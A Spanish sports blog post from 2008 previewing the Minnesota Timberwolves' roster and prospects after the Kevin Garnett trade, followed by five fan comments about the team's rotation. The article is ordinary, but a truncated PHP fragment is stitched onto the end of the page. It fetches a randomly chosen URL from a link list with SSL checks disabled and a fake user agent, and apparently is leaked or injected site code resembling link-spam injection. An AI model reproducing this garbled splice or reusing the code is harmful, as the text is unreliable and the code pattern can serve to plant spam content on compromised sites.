Minnesota Timberwolves: Otro pasito

25 de October de 2008 por txusma

El 31 de Julio de 2007 tuvo lugar uno de los traspasos más importantes de los  últimos años: Kevin Garnett, jugador franquicia y alma de los Wolves durante la mayor parte de sus 12 años en el equipo, se convertía en nuevo jugador de Boston. Aquel día arremetieron los análisis. Muchos seguidores de los Celtics consideraron que desprenderse de Al Jefferson, Gerald Green, Ryan Gomes, Theo Ratliff, Sebastian Telfair y un par de primeras rondas era demasiado. En cambio, algunos seguidores de los Wolves afirmaban convencidos que Kevin McHale debería haber sacado más tajada por su estrella. Ha pasado un año y creo que ambas franquicias pueden considerarse satisfechas de aquel traspaso. Boston y Garnett tienen lo que buscaban desde hace tanto tiempo, un reluciente anillo de campeón, y Minnessota posee una base de jugadores jóvenes encabezados por Al Jefferson y que también incluye a Ryan Gomes y Sebastian Telfair, que forma unos cimientos muy interesantes a medio y largo plazo.

Y es que en Minnesota este verano las cosas se han seguido haciendo bien: En el draft escogieron a OJ Mayo, que fue inmediatamente traspasado a los Grizzlies a cambio de Mike Miller y el prometedor ala-pivot proveninente de la universidad de UCLA, Kevin Love. En julio se hicieron con los servicios del alero de los Sixers Rodney Carney más una primera ronda a cambio de una segunda ronda del draft y de proporcionar a los Sixers el espacio salarial necesario para fichar a Elton Brand.

Entrenados por Randy Wittman y liderados en el cancha por Al Jefferson, los Wolves han dejado muy  buenas impresiones durante la pretemporada. Jefferson ya jugó la temporada pasada un buen baloncesto y lo ha seguido haciendo este verano a pesar de una inoportuna lesión durante el training camp. A su lado, aunque es posible que no empiece la temporada como titular, estará la mayor parte del tiempo Kevin Love. Acusado en ocasiones de no ser demasiado atlético, lo que no se le puede negar al de UCLA es su gran talento y su espíritu de lucha. Tiene un buen tiro de media y larga distancia y una muy buena capacidad de pase, lo que le convertirá junto a Jefferson en una pareja interior a tener en cuenta por su talento y movilidad. Completaría el front court Corey Brewer, jugador de segundo año muy versátil y excelente defensor. Su año rookie fue muy decepcionante en el otro lado de la pista pero ha dedicado el verano a trabajar el dribbling y el tiro, y ya se han podido observar algunos resultados en los partidos de pretemporada. Por fuera, los titulares serán el recién llegado Mike Miller, del que todos conocemos sus características y que me da la impresión será importantísimo en este equipo aprovechando los huecos que dejen las defensas al defender a Jefferson y Love, y Randy Foye. Tras un año en que se perdió 40 partidos por una lesión, Foye afronta la temporada con ganas de demostrar que puede ser el base del equipo a la vez que explota su capacidad de anotador compulsivo. De momento, en un partido de pretemporada contra Denver repartió 15 asistencias en 26 minutos, lo que supone una excelente tarjeta de presentación.

En el banquillo, más juventud: Rashard McCants contará con minutos dado su arsenal ofensivo y pese a que defensivamente deja mucho de desear; Sebastian Telfair parece que asentó la cabeza el año pasado, dirigió al equipo correctamente y podrá disputar de nuevo minutos como base este año, aunque de momento ya le ha caído una suspensión de 3 partidos por hechos acontecidos mientras era jugador de los Celtics; Rodney Carney es también un buen defensor que junto con Brewer puede formar un tándem defensivo impresionante aunque deberá mejorar su arsenal ofensivo; Ryan Gomes o Craig Smith pueden empezar como titulares esta temporada aunque seguramente a la larga dejarán su sitio a Love. Ambos son jugadores fuertes y rocosos que puedan asumir responsabilidad ofensivas en momentos puntuales. En los últimos días también se ha incorporado al equipo David Harrison, pívot ex de Indiana que viene a reforzar un poco el juego interior aunque seguramente su presencia no será más que testimonial.

El proyecto de los Wolves empieza a tomar forma con un quinteto bastante compensado y un banquillo, sobre todo en sus posiciones exteriores, bastante profundo. Además la juventud de casi todos sus miembros asegura mucho futuro a un equipo que tiene como objetivo mejorar las prestaciones del año pasado y preparar el asalto a unos Playoffs en 1 ó 2 temporadas. Sin duda, otro proyecto apasionante que seguir de cerca.

Quinteto: Randy Foye, Mike Miller, Corey Brewer, Al Jefferson y Kevin Love

Sexto Hombre: Rashard McCants

Pronóstico: Fuera de Playoffs pero mejorando el récord de victorias de la temporada pasada.

Comenta

5 comentarios a esta entrada

  1. Cross dice:
    #1

    Diría que por jugadores,es un equipo ilusionante y lleno de futuro,pero veo muchas pegas.Por partes : El puesto de base estará ocupado por un combo guard.Hasta ahí parece lógico.Lo malo es que este combo llamado Foye no es mas que un escolta que en momentos puntuales jugaba de base(como lo puede hacer Jamal Crawford y compañía),no un base que en ocasiones puede jugar de escolta como es el caso de Deron Williams.Por ahí ya empiezan mal queriendole dar 30 y pico minutos como base.Si analizamos al suplente nos encontramos con un Telfair que después de jugar 32 minutos por partido no creo que se conforme con los 15 minutillos de descanso de Foye…Un Telfair desmotivado significa locura.”Que juegue a veces Foye de escolta junto con Telfair y solucionado”pensarán muchos.Pues llega el tercer problema : En las posiciones de escolta-alero nos encontramos a Mike Miller(el líder por experiencia),a un explosivo McCants que se ha salido ofensivamente hablando y a la gran promesa Brewer.Si a esto le añadimos que Gomes juega mas de alero que de ala-pívot,a Carney y al mencionado problema de Foye nos surge una ecatombe de carencia de minutos que se resolverá con la desmotivación y problemas derivados.Eso si,por dentro están bastante mas cubiertos.Jefferson puede jugar de 5 junto con Booth o Collins,y de 4 si Kevin Love no está muy preparado siempre quedará un gran cumplidor como es Craig Smith.Mad Madsen se quedará por si ahí lesiones.En conclusión : Un traspaso buscando un base por un escolta (Lowry?)sería lo ideal para un equipo mas equilibrado.

      Citar

  2. Jabho dice:
    #2

    Pues coincido con Txus en que es un equipo a seguir de cerca en los años siguientes, sobre todo si cuaja el tandem Love-Al Jeff.

    Respecto a lo que comenta Cross, hubiera sido bueno incluir aLowry en el trade de OJ, pero si no lo hicieron es porque no pudieron. EN cualquier caso Mike Miller, suba o no el balón, será el “base” del equipo casi seguro. Porque estoyd e acuerdo que Foye noes un base y Telafir, buff.

    Me gusta el cuarteto Brewer-Miller-Love-Al Jeff, suplentes osmo Foye, Gomes. McCants y Smith. Hay que verlos crecer. un buen base y quizás un interior rocoso tip0o Przybilla darian buena forma al equipo.

      Citar

  3. TheDeerHunter dice:
    #3

    El equipo está haciendo las cosas bien y los frutos llegarán (aunque lógicamente no este año)
    Bendito el problema de repartir minutos por exceso de pujantes jugadores que de seguro podrán entrar en algún movimiento que redondee el equipo. Lo importante, el armazón, lo tienen bien construido.

    Este sí es un interesante destino para algún agente libre que tenga el coraje de asumir retos.

      Citar

  4. Txusma dice:
    #4

    Iba a comentar lo de Deer: si el principal problema de los Wolves es q no tienen minutos para todos, bendito problema. Yo el equipo por fuera lo veo muy bien: tienen maquina anotadoras como McCants, Foye o Miller, jugadores defensivos como Brewer o Carney, un base como Telfair… A mi me parece muy bien armado. Y como digo Foye se enfrenta al reto de poder dirigir a este equipo, reto q creo cumplira con creces.
    Y por dentro con Love, Al Jefferson, Craig Smith y Gomes (q vale puede ser un 3 aunq le falte mucho/bastante tiro) son toda una garantia de futuro.

      Citar

  5. portu dice:
    #5

    El problema de repartir minutos entre jugadores jóvenes, con hambre de gloria y teóricamente poco cansancio acumulado es que cada uno querrá destacar en esos minutos, harán la guerra por su cuenta y sin duda, alguno de ellos no acabará de explotar nunca por falta de oportunidades. Este problema para mi es muy evidente en la posición de 2-3, donde creo q los titulares serán McCants y M. Miller, pese a q son jugadores demasiado parecidos, mákinas en ataque, algo escopetas a veces, pero flojos mentalmente en defensa. Brewer tiene q mejorar mucho y para ello necesitará minutos, pero yo particularmente sólo lo veo de 3, donde por otro lado, tb se mueve Gomes, al q han renovado por una buena pasta… Carney tb querrá entrar en las rotaciones y como bien decíais, no podemos olvidar los minutos de 2 q debería jugar Foye, tanto por conveniencia cuando esté acertado en el tiro como para mantener con la cabeza en su sitio a Telfair… en fin, mucho lío exterior q en principio puede penalizar a Carney y Gomes, lo cual podría ser asumible, pero sería una pena q McCants o Brewer no dispusieran de 30 minutos cada uno. Si las cosas van mal en cuanto a nº de victorias imagino q Miller será tradeado.
    En el juego interior veo los roles más claros y las opciones más compensadas, aunque creo q la pareja titular será Craig Smith-Al Jefferson.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>